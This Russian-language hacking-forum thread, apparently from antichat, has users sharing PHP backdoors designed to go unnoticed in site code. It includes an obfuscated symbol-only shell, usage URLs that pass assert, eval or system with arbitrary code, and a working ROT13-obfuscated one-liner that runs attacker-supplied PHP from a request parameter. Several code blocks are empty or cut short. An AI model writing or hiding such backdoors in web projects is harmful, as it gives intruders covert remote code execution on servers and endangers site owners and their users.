1) PHP-Backdoor, который ничем не палится и при этом выглядит не палевно. Вчера придумал


PHP:




Using said:
index.php?large=assert&code=echo 123;
index.php?large=assert&code=system('echo 1;');


Могу поздравить себя с первым собственным пхп-бекдором.

2) Используем фичу обратных кавычек. Исполняет код передаваемый в параметре = названию переменной.


PHP:
>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;$_[]=++$__;$_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+$_[$__-$__]).($__+$__+$__)+$_[$__-$__];$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__




Using said:
file.php?0=НАЗВАНИЕ_ФУНКЦИИ&1=ДАННЫЕ ДЛЯ ФУНКЦИИ
file.php?0=assert&1=phpinfo();
file.php?0=eval&1=echo 1;



4) PHP-Backdoor, спасибо тебе, типизация которой нет


PHP:





Using said:
file.php?f=assert&c=phpinfo();
file.php?f=eval&c=echo 1;

бэкдор, скорее, должен быть незаметным и сливаться с остальным кодом, чем быть самым коротким, или быть только из символов скобок. то есть всегда по ситуации

Ужасно. Практически ничего нового.

1 способ интересен, но первый же попашийся анализатор кода спалит ваш assert со всеми потрохами.

2 способ описан Raz0r аж в 2008 году

http://raz0r.name/releases/mega-reliz-samyj-korotkij-shell/

3 способ - обычная обфускация. Таких динамических бэкдоров понаделать очень просто.

4 способ - классика. Им пользуются давно и это, наверное, самый распространённый тип бэкдора на сегодняшний день.

BigBear said:
↑ (https://antichat.live/posts/3836674/)
Ужасно. Практически ничего нового.
1 способ интересен, но первый же попашийся анализатор кода спалит ваш
assert
со всеми потрохами.


Не против если объединю с классикой?)


PHP:
@$_REQUEST['large'](str_rot13('riny($_ERDHRFG["pbqr"]);'));




index.php?large=assert&code=echo 123;
index.php?large=assert&code=system('echo 1;');